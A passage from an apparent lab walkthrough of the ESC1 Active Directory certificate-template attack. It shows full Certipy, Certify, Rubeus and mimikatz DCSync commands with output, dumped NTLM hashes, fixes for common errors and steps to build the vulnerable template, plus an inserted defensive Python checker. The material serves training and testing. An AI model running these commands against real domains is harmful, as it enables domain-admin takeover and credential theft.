232 | 5. Verify you can ping the target's host name, which in this case was WIN-8HPLF8PSHC1.hacklab.local. If you can't ping it, add the host name to your Ubuntu /etc/hosts file.
233 |
234 | ```
235 | sudo nano /etc/hosts
236 |
237 | 127.0.0.1 localhost
238 | 127.0.1.1 ubuntu-virtual-machine
239 |
240 | 192.168.68.230 WIN-8HPLF8PSHC1.hacklab.local
241 |
242 |
243 | ping WIN-8HPLF8PSHC1.hacklab.local
244 | PING WIN-8HPLF8PSHC1.hacklab.local (192.168.68.230) 56(84) bytes of data.
245 | 64 bytes from WIN-8HPLF8PSHC1.hacklab.local (192.168.68.230): icmp_seq=1 ttl=128 time=12.8 ms
246 | 64 bytes from WIN-8HPLF8PSHC1.hacklab.local (192.168.68.230): icmp_seq=2 ttl=128 time=1.15 ms
247 | ```
248 |
249 |
250 | 6. Exploit the vuln certificate
251 |
252 | ```
253 | (Tools) ubuntu@ubuntu-virtual-machine:~/Documents/Tools$ certipy req -u g.white -k -no-pass -ca 'hacklab-WIN-8HPLF8PSHC1-CA' -target 'WIN-8HPLF8PSHC1.hacklab.local' -template ESC1-Vun1 -dc-ip 192.168.68.230 -ptt -upn 'da1@hacklab.local' -debug
254 | Certipy v4.8.2 - by Oliver Lyak (ly4k)
255 |
256 | [+] Domain retrieved from CCache: HACKLAB.LOCAL
257 | [+] Username retrieved from CCache: g.white
258 | [+] Trying to resolve 'WIN-8HPLF8PSHC1.hacklab.local' at '192.168.68.230'
259 | [+] Generating RSA key
260 | [*] Requesting certificate via RPC
261 | [+] Using Kerberos Cache: g.white.ccache
262 | [+] Using TGT from cache
263 | [+] Username retrieved from CCache: g.white
264 | [+] Getting TGS for 'host/WIN-8HPLF8PSHC1.hacklab.local'
265 | [+] Got TGS for 'host/WIN-8HPLF8PSHC1.hacklab.local'
266 | [+] Trying to connect to endpoint: ncacn_np:192.168.68.230[\pipe\cert]
267 | [+] Connected to endpoint: ncacn_np:192.168.68.230[\pipe\cert]
268 | [*] Successfully requested certificate
269 | [*] Request ID is 7
270 | [*] Got certificate with UPN 'da1@hacklab.local'
271 | [*] Certificate has no object SID
272 | [*] Saved certificate and private key to 'da1.pfx'
273 | ```
274 |
275 | 7. Extract a copy of the NTLM Hash
276 |
277 | ```
278 | (Tools) ubuntu@ubuntu-virtual-machine:~/Documents/Tools$ certipy auth -pfx da1.pfx -dc-ip 192.168.68.230
279 | Certipy v4.8.2 - by Oliver Lyak (ly4k)
280 |
281 | [*] Using principal: da1@hacklab.local
282 | [*] Trying to get TGT...
283 | [*] Got TGT
284 | [*] Saved credential cache to 'da1.ccache'
285 | [*] Trying to retrieve NT hash for 'da1'
286 | [*] Got hash for 'da1@hacklab.local': aad3b435b51404eeaad3b435b51404ee:fc525c9683e8fe067095ba2ddc971889
287 | ```
288 |
289 |
290 |
291 |
292 |
293 | **Common errors and how to fix them**
294 |
295 | 1. CRYPT_E_REVOCATION_OFFLINE - The revocation function was unable to check revocation because the revocation server was offline.
296 |
297 | There are two fixes for this error: the first approach is to reboot the DC, the second approach is listed below.
298 |
299 | ```
300 | (Tools) ubuntu@ubuntu-virtual-machine:~/Documents/Tools$ certipy req -u g.white -k -no-pass -ca 'hacklab-WIN-8HPLF8PSHC1-CA' -target 'WIN-8HPLF8PSHC1.hacklab.local' -template ESC1-Vun1 -dc-ip 192.168.68.230 -ptt -upn 'da1@hacklab.local' -debug
301 | Certipy v4.8.2 - by Oliver Lyak (ly4k)
302 |
303 | [+] Domain retrieved from CCache: HACKLAB.LOCAL
304 | [+] Username retrieved from CCache: g.white
305 | [+] Trying to resolve 'WIN-8HPLF8PSHC1.hacklab.local' at '192.168.68.230'
306 | [+] Generating RSA key
307 | [*] Requesting certificate via RPC
308 | [+] Using Kerberos Cache: g.white.ccache
309 | [+] Using TGT from cache
310 | [+] Username retrieved from CCache: g.white
311 | [+] Getting TGS for 'host/WIN-8HPLF8PSHC1.hacklab.local'
312 | [+] Got TGS for 'host/WIN-8HPLF8PSHC1.hacklab.local'
313 | [+] Trying to connect to endpoint: ncacn_np:192.168.68.230[\pipe\cert]
314 | [+] Connected to endpoint: ncacn_np:192.168.68.230[\pipe\cert]
315 | [-] Got error while trying to request certificate: code: 0x80092013 - CRYPT_E_REVOCATION_OFFLINE - The revocation function was unable to check revocation because the revocation server was offline.
316 | [*] Request ID is 6
317 | Would you like to save the private key? (y/N)
318 | [-] Failed to request certificate
319 | ```
320 |
321 | Fix - https://stealthpuppy.com/resolving-issues-starting-ca-offline-crl/
322 |
323 | Open an admin CMD on your DC and execute
324 |
325 | ```
326 | certutil -setreg ca\CRLFlags +CRLF_REVCHECK_IGNORE_OFFLINE
327 | ```
328 |
329 |
330 | ```
331 | C:\Users\Administrator>certutil -setreg ca\CRLFlags +CRLF_REVCHECK_IGNORE_OFFLINE
332 | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\CertSvc\Configuration\hacklab-WIN-8HPLF8PSHC1-CA\CRLFlags:
333 |
334 | Old Value:
335 | CRLFlags REG_DWORD = 2
336 | CRLF_DELETE_EXPIRED_CRLS -- 2
337 |
338 | New Value:
339 | CRLFlags REG_DWORD = a (10)
340 | CRLF_DELETE_EXPIRED_CRLS -- 2
341 | CRLF_REVCHECK_IGNORE_OFFLINE -- 8
342 | CertUtil: -setreg command completed successfully.
343 | The CertSvc service may need to be restarted for changes to take effect.
344 | ```
345 |
346 |
347 | 2. TGT: Kerberos SessionError: KDC_ERR_KEY_EXPIRED(Password has expired; change password to reset)
348 |
349 | Meaning - The DA account's password has not been configured to never expire; it has expired and must be changed before an NTLM hash can be harvested.
350 |
351 | ```
352 | (Tools) ubuntu@ubuntu-virtual-machine:~/Documents/Tools$ certipy req -u g.white -k -no-pass -ca 'hacklab-WIN-8HPLF8PSHC1-CA' -target 'WIN-8HPLF8PSHC1.hacklab.local' -template ESC1-Vun1 -dc-ip 192.168.68.230 -ptt -upn 'svc_admin@hacklab.local' -debug
353 | Certipy v4.8.2 - by Oliver Lyak (ly4k)
354 |
355 | [+] Domain retrieved from CCache: HACKLAB.LOCAL
356 | [+] Username retrieved from CCache: g.white
357 | [+] Trying to resolve 'WIN-8HPLF8PSHC1.hacklab.local' at '192.168.68.230'
358 | [+] Generating RSA key
359 | [*] Requesting certificate via RPC
360 | [+] Using Kerberos Cache: g.white.ccache
361 | [+] Using TGT from cache
362 | [+] Username retrieved from CCache: g.white
363 | [+] Getting TGS for 'host/WIN-8HPLF8PSHC1.hacklab.local'
364 | [+] Got TGS for 'host/WIN-8HPLF8PSHC1.hacklab.local'
365 | [+] Trying to connect to endpoint: ncacn_np:192.168.68.230[\pipe\cert]
366 | [+] Connected to endpoint: ncacn_np:192.168.68.230[\pipe\cert]
367 | [*] Successfully requested certificate
368 | [*] Request ID is 8
369 | [*] Got certificate with UPN 'svc_admin@hacklab.local'
370 | [*] Certificate has no object SID
371 | [*] Saved certificate and private key to 'svc_admin.pfx'
372 | (Tools) ubuntu@ubuntu-virtual-machine:~/Documents/Tools$ certipy auth -pfx svc_admin.pfx -dc-ip 192.168.68.230
373 | Certipy v4.8.2 - by Oliver Lyak (ly4k)
374 |
375 | [*] Using principal: svc_admin@hacklab.local
376 | [*] Trying to get TGT...
377 | [-] Got error while trying to request TGT: Kerberos SessionError: KDC_ERR_KEY_EXPIRED(Password has expired; change password to reset)
378 | ```
379 |
380 | Reset the password on the DC for that account and it will then work.
381 |
382 | ```
383 | (Tools) ubuntu@ubuntu-virtual-machine:~/Documents/Tools$ certipy req -u g.white -k -no-pass -ca 'hacklab-WIN-8HPLF8PSHC1-CA' -target 'WIN-8HPLF8PSHC1.hacklab.local' -template ESC1-Vun1 -dc-ip 192.168.68.230 -ptt -upn 'svc_admin@hacklab.local' -debug
384 | Certipy v4.8.2 - by Oliver Lyak (ly4k)
385 |
386 | [+] Domain retrieved from CCache: HACKLAB.LOCAL
387 | [+] Username retrieved from CCache: g.white
388 | [+] Trying to resolve 'WIN-8HPLF8PSHC1.hacklab.local' at '192.168.68.230'
389 | [+] Generating RSA key
390 | [*] Requesting certificate via RPC
391 | [+] Using Kerberos Cache: g.white.ccache
392 | [+] Using TGT from cache
393 | [+] Username retrieved from CCache: g.white
394 | [+] Getting TGS for 'host/WIN-8HPLF8PSHC1.hacklab.local'
395 | [+] Got TGS for 'host/WIN-8HPLF8PSHC1.hacklab.local'
396 | [+] Trying to connect to endpoint: ncacn_np:192.168.68.230[\pipe\cert]
397 | [+] Connected to endpoint: ncacn_np:192.168.68.230[\pipe\cert]
398 | [*] Successfully requested certificate
399 | [*] Request ID is 9
400 | [*] Got certificate with UPN 'svc_admin@hacklab.local'
401 | [*] Certificate has no object SID
402 | [*] Saved certificate and private key to 'svc_admin.pfx'
403 | (Tools) ubuntu@ubuntu-virtual-machine:~/Documents/Tools$ certipy auth -pfx svc_admin.pfx -dc-ip 192.168.68.230
404 | Certipy v4.8.2 - by Oliver Lyak (ly4k)
405 |
406 | [*] Using principal: svc_admin@hacklab.local
407 | [*] Trying to get TGT...
408 | [*] Got TGT
409 | [*] Saved credential cache to 'svc_admin.ccache'
410 | [*] Trying to retrieve NT hash for 'svc_admin'
411 | [*] Got hash for 'svc_admin@hacklab.local': aad3b435b51404eeaad3b435b51404ee:fc525c9683e8fe067095ba2ddc971889
412 | ```
413 |
414 | **Using Certify**
415 |
416 | Finding Vulnerable certs
417 |
418 | ```
419 | C:\Users\g.white\Desktop\Tools>Certify.exe find /vulnerable
420 |
421 | _____ _ _ __
422 | / ____| | | (_)/ _|
423 | | | ___ _ __| |_ _| |_ _ _
424 | | | / _ \ '__| __| | _| | | |
425 | | |___| __/ | | |_| | | | |_| |
426 | \_____\___|_| \__|_|_| \__, |
427 | __/ |
428 | |___./
429 | v1.1.0
430 |
431 | [*] Action: Find certificate templates
432 | [*] Using the search base 'CN=Configuration,DC=hacklab,DC=local'
433 |
434 | [*] Listing info about the Enterprise CA 'hacklab-WIN-8HPLF8PSHC1-CA'
435 |
436 | Enterprise CA Name : hacklab-WIN-8HPLF8PSHC1-CA
437 | DNS Hostname : WIN-8HPLF8PSHC1.hacklab.local
438 | FullName : WIN-8HPLF8PSHC1.hacklab.local\hacklab-WIN-8HPLF8PSHC1-CA
439 | Flags : SUPPORTS_NT_AUTHENTICATION, CA_SERVERTYPE_ADVANCED
440 | Cert SubjectName : CN=hacklab-WIN-8HPLF8PSHC1-CA, DC=hacklab, DC=local
441 | Cert Thumbprint : 51A0D5E415EF8F50F5B4CA8CEC632B3D5A85F9E7
442 | Cert Serial : 354DB064F33080BD4EB9FEAABE87DCF1
443 | Cert Start Date : 23/04/2024 14:56:37
444 | Cert End Date : 23/04/2029 15:06:33
445 | Cert Chain : CN=hacklab-WIN-8HPLF8PSHC1-CA,DC=hacklab,DC=local
446 | UserSpecifiedSAN : Disabled
447 | CA Permissions :
448 | Owner: BUILTIN\Administrators S-1-5-32-544
449 |
450 | Access Rights Principal
451 |
452 | Allow Enroll NT AUTHORITY\Authenticated UsersS-1-5-11
453 | Allow ManageCA, ManageCertificates BUILTIN\Administrators S-1-5-32-544
454 | Allow ManageCA, ManageCertificates HACKLAB\Domain Admins S-1-5-21-2199964591-1196550447-1073987862-512
455 | Allow ManageCA, ManageCertificates HACKLAB\Enterprise Admins S-1-5-21-2199964591-1196550447-1073987862-519
456 | Enrollment Agent Restrictions : None
457 |
458 | [!] Vulnerable certificate templates that exist but an Enterprise CA does not publish:
459 |
460 | ESC3-Vuln2
461 |
462 |
463 | [!] Vulnerable Certificates Templates :
464 |
465 | CA Name : WIN-8HPLF8PSHC1.hacklab.local\hacklab-WIN-8HPLF8PSHC1-CA
466 | Template Name : ESC1-Vun1
467 | Schema Version : 2
468 | Validity Period : 1 year
469 | Renewal Period : 6 weeks
470 | msPKI-Certificate-Name-Flag : ENROLLEE_SUPPLIES_SUBJECT
471 | mspki-enrollment-flag : PUBLISH_TO_DS
472 | Authorized Signatures Required : 0
473 | pkiextendedkeyusage : Client Authentication, Server Authentication
474 | mspki-certificate-application-policy : Client Authentication, Server Authentication
475 | Permissions
476 | Enrollment Permissions
477 | Enrollment Rights : HACKLAB\Domain Admins S-1-5-21-2199964591-1196550447-1073987862-512
478 | HACKLAB\Domain Computers S-1-5-21-2199964591-1196550447-1073987862-515
479 | HACKLAB\Domain Users S-1-5-21-2199964591-1196550447-1073987862-513
480 | HACKLAB\Enterprise Admins S-1-5-21-2199964591-1196550447-1073987862-519
481 | NT AUTHORITY\Authenticated UsersS-1-5-11
482 | Object Control Permissions
483 | Owner : HACKLAB\Administrator S-1-5-21-2199964591-1196550447-1073987862-500
484 | WriteOwner Principals : HACKLAB\Administrator S-1-5-21-2199964591-1196550447-1073987862-500
485 | HACKLAB\Domain Admins S-1-5-21-2199964591-1196550447-1073987862-512
486 | HACKLAB\Enterprise Admins S-1-5-21-2199964591-1196550447-1073987862-519
487 | WriteDacl Principals : HACKLAB\Administrator S-1-5-21-2199964591-1196550447-1073987862-500
488 | HACKLAB\Domain Admins S-1-5-21-2199964591-1196550447-1073987862-512
489 | HACKLAB\Enterprise Admins S-1-5-21-2199964591-1196550447-1073987862-519
490 | WriteProperty Principals : HACKLAB\Administrator S-1-5-21-2199964591-1196550447-1073987862-500
491 | HACKLAB\Domain Admins S-1-5-21-2199964591-1196550447-1073987862-512
492 | HACKLAB\Enterprise Admins S-1-5-21-2199964591-1196550447-1073987862-519
493 |
494 | CA Name : WIN-8HPLF8PSHC1.hacklab.local\hacklab-WIN-8HPLF8PSHC1-CA
495 | Template Name : Vuln_Cert
496 | Schema Version : 2
497 | Validity Period : 1 year
498 | Renewal Period : 6 weeks
499 | msPKI-Certificate-Name-Flag : ENROLLEE_SUPPLIES_SUBJECT
500 | mspki-enrollment-flag : INCLUDE_SYMMETRIC_ALGORITHMS, PUBLISH_TO_DS
501 | Authorized Signatures Required : 0
502 | pkiextendedkeyusage : Client Authentication, Encrypting File System, Secure Email
503 | mspki-certificate-application-policy : Client Authentication, Encrypting File System, Secure Email
504 | Permissions
505 | Enrollment Permissions
506 | Enrollment Rights : HACKLAB\Domain Admins S-1-5-21-2199964591-1196550447-1073987862-512
507 | HACKLAB\Domain Users S-1-5-21-2199964591-1196550447-1073987862-513
508 | HACKLAB\Enterprise Admins S-1-5-21-2199964591-1196550447-1073987862-519
509 | NT AUTHORITY\Authenticated UsersS-1-5-11
510 | Object Control Permissions
511 | Owner : HACKLAB\Administrator S-1-5-21-2199964591-1196550447-1073987862-500
512 | WriteOwner Principals : HACKLAB\Administrator S-1-5-21-2199964591-1196550447-1073987862-500
513 | HACKLAB\Domain Admins S-1-5-21-2199964591-1196550447-1073987862-512
514 | HACKLAB\Enterprise Admins S-1-5-21-2199964591-1196550447-1073987862-519
515 | WriteDacl Principals : HACKLAB\Administrator S-1-5-21-2199964591-1196550447-1073987862-500
516 | HACKLAB\Domain Admins S-1-5-21-2199964591-1196550447-1073987862-512
517 | HACKLAB\Enterprise Admins S-1-5-21-2199964591-1196550447-1073987862-519
518 | WriteProperty Principals : HACKLAB\Administrator S-1-5-21-2199964591-1196550447-1073987862-500
519 | HACKLAB\Domain Admins S-1-5-21-2199964591-1196550447-1073987862-512
520 | HACKLAB\Enterprise Admins S-1-5-21-2199964591-1196550447-1073987862-519
521 |
522 |
523 |
524 | Certify completed in 00:00:01.2930508
525 | ```
526 |
527 | **The following details the sections that make a certificate vulnerable to ESC1. Look for the lines annotated with asterisks for more info.**
528 |
529 | ```
530 | CA Name : WIN-8HPLF8PSHC1.hacklab.local\hacklab-WIN-8HPLF8PSHC1-CA
531 | Template Name : ESC1-Vun1 - **You need this**
532 | Schema Version : 2
533 | Validity Period : 1 year
534 | Renewal Period : 6 weeks
535 | msPKI-Certificate-Name-Flag : ENROLLEE_SUPPLIES_SUBJECT - **To be vuln it has to say ENROLLEE_SUPPLIES_SUBJECT**
536 | mspki-enrollment-flag : PUBLISH_TO_DS
537 | Authorized Signatures Required : 0
538 | pkiextendedkeyusage : Client Authentication, Server Authentication - **To be vuln it has to include Client Authentication**
539 | mspki-certificate-application-policy : Client Authentication, Server Authentication
540 | Permissions
541 | Enrollment Permissions
542 | Enrollment Rights : HACKLAB\Domain Admins S-1-5-21-2199964591-1196550447-1073987862-512
543 | HACKLAB\Domain Computers S-1-5-21-2199964591-1196550447-1073987862-515
544 | HACKLAB\Domain Users S-1-5-21-2199964591-1196550447-1073987862-513
545 | HACKLAB\Enterprise Admins S-1-5-21-2199964591-1196550447-1073987862-519
546 | NT AUTHORITY\Authenticated UsersS-1-5-11 - **To be vuln it has to include Authenticated UsersS-1-5-11**
547 | Object Control Permissions
548 | Owner : HACKLAB\Administrator S-1-5-21-2199964591-1196550447-1073987862-500
549 | WriteOwner Principals : HACKLAB\Administrator S-1-5-21-2199964591-1196550447-1073987862-500
550 | HACKLAB\Domain Admins S-1-5-21-2199964591-1196550447-1073987862-512
551 | HACKLAB\Enterprise Admins S-1-5-21-2199964591-1196550447-1073987862-519
552 | WriteDacl Principals : HACKLAB\Administrator S-1-5-21-2199964591-1196550447-1073987862-500
553 | HACKLAB\Domain Admins S-1-5-21-2199964591-1196550447-1073987862-512
554 | HACKLAB\Enterprise Admins S-1-5-21-2199964591-1196550447-1073987862-519
555 | WriteProperty Principals : HACKLAB\Administrator S-1-5-21-2199964591-1196550447-1073987862-500
556 | HACKLAB\Domain Admins S-1-5-21-2199964591-1196550447-1073987862-512
557 | HACKLAB\Enterprise Admins S-1-5-21-2199964591-1196550447-1073987862-519
558 | ```
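
A defender-side check of the same conditions, as an added example (not code from this repo): it parses Certify-style `find` output and reports whether each template meets every ESC1 condition, or which control blocks it. The function names, the `Approval-Gated` and `Admins-Only` templates, and the extra low-privilege groups and EKUs beyond the ones annotated above are assumptions added here.

```python
import re

# Constructed sample modelled on the Certify output above. Lab names and SIDs come
# from the page; "Approval-Gated" and "Admins-Only" are hypothetical contrast cases.
SAMPLE = r"""
CA Name : WIN-8HPLF8PSHC1.hacklab.local\hacklab-WIN-8HPLF8PSHC1-CA
Template Name : ESC1-Vun1
msPKI-Certificate-Name-Flag : ENROLLEE_SUPPLIES_SUBJECT
mspki-enrollment-flag : PUBLISH_TO_DS
Authorized Signatures Required : 0
pkiextendedkeyusage : Client Authentication, Server Authentication
Permissions
Enrollment Permissions
Enrollment Rights : HACKLAB\Domain Admins S-1-5-21-2199964591-1196550447-1073987862-512
HACKLAB\Domain Users S-1-5-21-2199964591-1196550447-1073987862-513
NT AUTHORITY\Authenticated UsersS-1-5-11
Object Control Permissions
Owner : HACKLAB\Administrator S-1-5-21-2199964591-1196550447-1073987862-500

CA Name : WIN-8HPLF8PSHC1.hacklab.local\hacklab-WIN-8HPLF8PSHC1-CA
Template Name : Approval-Gated
msPKI-Certificate-Name-Flag : ENROLLEE_SUPPLIES_SUBJECT
mspki-enrollment-flag : PUBLISH_TO_DS, PEND_ALL_REQUESTS
Authorized Signatures Required : 0
pkiextendedkeyusage : Client Authentication
Enrollment Rights : HACKLAB\Domain Users S-1-5-21-2199964591-1196550447-1073987862-513

CA Name : WIN-8HPLF8PSHC1.hacklab.local\hacklab-WIN-8HPLF8PSHC1-CA
Template Name : Admins-Only
msPKI-Certificate-Name-Flag : ENROLLEE_SUPPLIES_SUBJECT
mspki-enrollment-flag : PUBLISH_TO_DS
Authorized Signatures Required : 0
pkiextendedkeyusage : Client Authentication
Enrollment Rights : HACKLAB\Domain Admins S-1-5-21-2199964591-1196550447-1073987862-512
HACKLAB\Enterprise Admins S-1-5-21-2199964591-1196550447-1073987862-519
"""

SID_RE = re.compile(r"S-1-\d+(?:-\d+)+")
# Principals any authenticated account belongs to. The page annotates Authenticated
# Users; Everyone, Domain Users and Domain Computers are added here (assumption).
LOW_PRIV_SIDS = {"S-1-1-0": "Everyone", "S-1-5-11": "Authenticated Users"}
LOW_PRIV_RIDS = {"513": "Domain Users", "515": "Domain Computers"}
# The page names Client Authentication; the other two EKUs are added here (assumption).
AUTH_EKUS = {"Client Authentication", "Smart Card Logon", "Any Purpose"}


def parse_templates(text):
    """Split the output into one dict per template: lower-cased key -> list of values."""
    templates, current, key = [], None, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        head, sep, value = line.partition(" : ")
        if sep:
            head = head.strip().lower()
            if head == "ca name":          # every template block starts with its CA
                current = {}
                templates.append(current)
            if current is None:
                continue
            key = head
            current[key] = [value.strip()]
        elif current is not None and key and SID_RE.search(line):
            current[key].append(line)      # continuation line of a principal list
        else:
            key = None                     # section header such as "Permissions"
    return templates


def flags(template, key):
    """Comma-separated values of a field as a set."""
    return {f.strip() for v in template.get(key, []) for f in v.split(",") if f.strip()}


def low_priv_enrollers(template):
    """Names of broad, low-privilege groups that hold enrollment rights."""
    found = []
    for entry in template.get("enrollment rights", []):
        match = SID_RE.search(entry)       # also matches when the name and SID run together
        if not match:
            continue
        sid = match.group(0)
        rid = sid.rsplit("-", 1)[1]
        if sid in LOW_PRIV_SIDS:
            found.append(LOW_PRIV_SIDS[sid])
        elif sid.startswith("S-1-5-21-") and rid in LOW_PRIV_RIDS:
            found.append(LOW_PRIV_RIDS[rid])
    return found


def esc1_conditions(template):
    """Each ESC1 precondition as a boolean; all must hold for the template to be exposed."""
    sigs = template.get("authorized signatures required", ["0"])[0]
    return {
        "enrollee_supplies_subject": "ENROLLEE_SUPPLIES_SUBJECT" in flags(template, "mspki-certificate-name-flag"),
        "authentication_eku": bool(flags(template, "pkiextendedkeyusage") & AUTH_EKUS),
        "no_manager_approval": "PEND_ALL_REQUESTS" not in flags(template, "mspki-enrollment-flag"),
        "no_authorized_signature": sigs.isdigit() and int(sigs) == 0,
        "low_priv_enrollment": bool(low_priv_enrollers(template)),
    }


def audit(text):
    """Per template: ESC1 verdict, the conditions that block it, and the broad enrollers."""
    report = {}
    for tpl in parse_templates(text):
        cond = esc1_conditions(tpl)
        report[tpl.get("template name", ["<unnamed>"])[0]] = {
            "esc1": all(cond.values()),
            "blocked_by": sorted(k for k, ok in cond.items() if not ok),
            "enrollers": low_priv_enrollers(tpl),
        }
    return report


if __name__ == "__main__":
    for name, result in audit(SAMPLE).items():
        print(name, result)
```

The `blocked_by` list doubles as a remediation checklist: removing any one condition (manager approval, restricted enrollment, or building the subject from AD instead of the request) takes the template out of ESC1.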
559 |
560 | Exploiting the template by requesting a certificate for an account that belongs to the Domain Admins group.
561 |
562 | ```
563 | C:\Users\g.white\Desktop\Tools>certify.exe request /ca:WIN-8HPLF8PSHC1.hacklab.local\hacklab-WIN-8HPLF8PSHC1-CA /template:ESC1-Vun1 /altname:da1
564 |
565 | _____ _ _ __
566 | / ____| | | (_)/ _|
567 | | | ___ _ __| |_ _| |_ _ _
568 | | | / _ \ '__| __| | _| | | |
569 | | |___| __/ | | |_| | | | |_| |
570 | \_____\___|_| \__|_|_| \__, |
571 | __/ |
572 | |___./
573 | v1.1.0
574 |
575 | [*] Action: Request a Certificates
576 |
577 | [*] Current user context : HACKLAB\g.white
578 | [*] No subject name specified, using current context as subject.
579 |
580 | [*] Template : ESC1-Vun1
581 | [*] Subject : CN=g.white, OU=Administration, OU=Head_Office, OU=Departments, DC=hacklab, DC=local
582 | [*] AltName : da1
583 |
584 | [*] Certificate Authority : WIN-8HPLF8PSHC1.hacklab.local\hacklab-WIN-8HPLF8PSHC1-CA
585 |
586 | [*] CA Response : The certificate had been issued.
587 | [*] Request ID : 15
588 |
589 | [*] cert.pem :
590 |
591 | -----BEGIN RSA PRIVATE KEY-----
612 | -----END RSA PRIVATE KEY-----
613 | -----BEGIN CERTIFICATE-----
643 | -----END CERTIFICATE-----
644 |
645 |
646 | [*] Convert with: openssl pkcs12 -in cert.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out cert.pfx
647 |
648 |
649 |
650 | Certify completed in 00:00:04.7931478
651 | ```
652 |
653 | **Copy everything from -----BEGIN RSA PRIVATE KEY----- to -----END CERTIFICATE----- into a file on Linux/macOS (open nano and save the contents as cert.pem), then run the openssl command to convert it to a .pfx. When prompted, don't enter a password:**
654 |
655 | ```
656 | ubuntu@ubuntu-virtual-machine:~/Documents/Tools$ openssl pkcs12 -in cert.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out cert.pfx
657 | Enter Export Password:
658 | Verifying - Enter Export Password:
659 | ```
660 |
661 | **Finally, move the cert.pfx to your target machine filesystem (manually or through Cobalt Strike), and request a TGT for the altname user using Rubeus:**
662 |
663 | ```
664 | C:\Users\g.white\Desktop\Tools>Rubeus.exe asktgt /user:da1 /certificate:C:\Users\g.white\Desktop\Tools\Cert\cert.pfx
665 |
666 | ______ _
667 | (_____ \ | |
668 | _____) )_ _| |__ _____ _ _ ___
669 | | __ /| | | | _ \| ___ | | | |/___)
670 | | | \ \| |_| | |_) ) ____| |_| |___ |
671 | |_| |_|____/|____/|_____)____/(___/
672 |
673 | v2.0.1
674 |
675 | [*] Action: Ask TGT
676 |
677 | [*] Using PKINIT with etype rc4_hmac and subject: CN=g.white, OU=Administration, OU=Head_Office, OU=Departments, DC=hacklab, DC=local
678 | [*] Building AS-REQ (w/ PKINIT preauth) for: 'hacklab.local\da1'
679 | [+] TGT request successful!
680 | [*] base64(ticket.kirbi):
681 |
703 |
704 | ServiceName : krbtgt/hacklab.local
705 | ServiceRealm : HACKLAB.LOCAL
706 | UserName : da1
707 | UserRealm : HACKLAB.LOCAL
708 | StartTime : 15/07/2024 13:25:05
709 | EndTime : 15/07/2024 23:25:05
710 | RenewTill : 22/07/2024 13:25:05
711 | Flags : name_canonicalize, pre_authent, initial, renewable, forwardable
712 | KeyType : rc4_hmac
713 | Base64(key) : UhoZLx-Redacted-r12STt9g==
714 | ASREP (key) : 902A410-Redacted-F7F5D96D
715 |
716 |
717 | C:\Users\g.white\Desktop\Tools>
718 | ```
719 |
720 | **You can then use mimikatz to dump the NTLM hash. You do not need to run mimikatz with admin privileges.**
721 |
722 | ```
723 | mimikatz # lsadump::dcsync /dc:WIN-8HPLF8PSHC1.hacklab.local /domain:hacklab.local /user:da1
724 | [DC] 'hacklab.local' will be the domain
725 | [DC] 'WIN-8HPLF8PSHC1.hacklab.local' will be the DC server
726 | [DC] 'da1' will be the user account
727 | [rpc] Service : ldap
728 | [rpc] AuthnSvc : GSS_NEGOTIATE (9)
729 |
730 | Object RDN : da1
731 |
732 | ** SAM ACCOUNT **
733 |
734 | SAM Username : da1
735 | User Principal Name : da1@hacklab.local
736 | Account Type : 30000000 ( USER_OBJECT )
737 | User Account Control : 00010200 ( NORMAL_ACCOUNT DONT_EXPIRE_PASSWD )
738 | Account expiration :
739 | Password last change : 15/04/2024 12:37:12
740 | Object Security ID : S-1-5-21-2199964591-1196550447-1073987862-1103
741 | Object Relative ID : 1103
742 |
743 | Credentials:
744 | Hash NTLM: fc525c9683e8fe067095ba2ddc971889
745 | ntlm- 0: fc525c9683e8fe067095ba2ddc971889
746 | lm - 0: 1037af637604d47c1309c0d208172545
747 | ```
748 |
749 |
750 | **Certify errors**
751 |
752 | The below error was caused because I executed the certify.exe file without also moving the Interop.CERTENROLLLib.dll file. Add the Interop.CERTENROLLLib.dll file to the same directory and the problem is fixed.
753 |
754 | ```
755 | C:\Users\g.white\Desktop\Tools>certify.exe request /ca:WIN-8HPLF8PSHC1.hacklab.local\hacklab-WIN-8HPLF8PSHC1-CA /template:ESC1-Vun1 /altname:da1
756 |
757 | _____ _ _ __
758 | / ____| | | (_)/ _|
759 | | | ___ _ __| |_ _| |_ _ _
760 | | | / _ \ '__| __| | _| | | |
761 | | |___| __/ | | |_| | | | |_| |
762 | \_____\___|_| \__|_|_| \__, |
763 | __/ |
764 | |___./
765 | v1.1.0
766 |
767 | [*] Action: Request a Certificates
768 |
769 | [!] Unhandled Certify exception:
770 |
771 | System.IO.FileNotFoundException: Could not load file or assembly 'Interop.CERTENROLLLib, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null' or one of its dependencies. The system cannot find the file specified.
772 | File name: 'Interop.CERTENROLLLib, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null'
773 | at Certify.Cert.RequestCert(String CA, Boolean machineContext, String templateName, String subject, String altName, String sidExtension, Boolean install)
774 | at Certify.Commands.Request.Execute(Dictionary`2 arguments)
775 | at Certify.CommandCollection.ExecuteCommand(String commandName, Dictionary`2 arguments)
776 | at Certify.Program.MainExecute(String commandName, Dictionary`2 parsedArgs)
777 | ```
778 |
779 |
780 |
781 |
782 | **Creating Vulnerable ESC1 Certificate**
783 |
784 |
785 | 1. Open Server Manager / Tools / Certification Authority.
786 |
787 | 
788 |
789 |
790 | 2. Right click on Certificate Templates / Manage.
791 |
792 | 
793 |
794 |
795 | 3. Scroll down to User, right click and select Duplicate Template.
796 |
797 | 
798 |
799 |
800 | 4. Click on the General tab and rename the certificate.
801 |
802 | 
803 |
804 | 5. Click on the Security tab and for Authenticated Users, tick Enroll.
805 |
806 | 
807 |
808 | 6. Click on the Subject Name tab and select Supply in the request.
809 |
810 | 
811 |
812 | 7. Apply then click OK.
813 |
814 | 8. Go back to Certification Authority / Certificate Templates, right click, then select Certificate Template to Issue.
815 |
816 | 
817 |
818 | 9. Select your created certificate and then click OK.
819 |
820 | 
821 |
822 | 10. You should then see your active certificate.
823 |
824 | 
825 |
826 |
827 | The following has been included to demonstrate that the certificate was then vulnerable.
828 |
829 | ```
830 | (Tools) ubuntu@ubuntu-virtual-machine:~/Documents/Tools$ certipy find -u g.white -p "Passw0rd!" -dc-ip 192.168.68.230 -scheme ldaps -ldap-channel-binding
831 | Certipy v4.8.2 - by Oliver Lyak (ly4k)
832 |
833 | [*] Finding certificate templates
834 | [*] Found 36 certificate templates
835 | [*] Finding certificate authorities
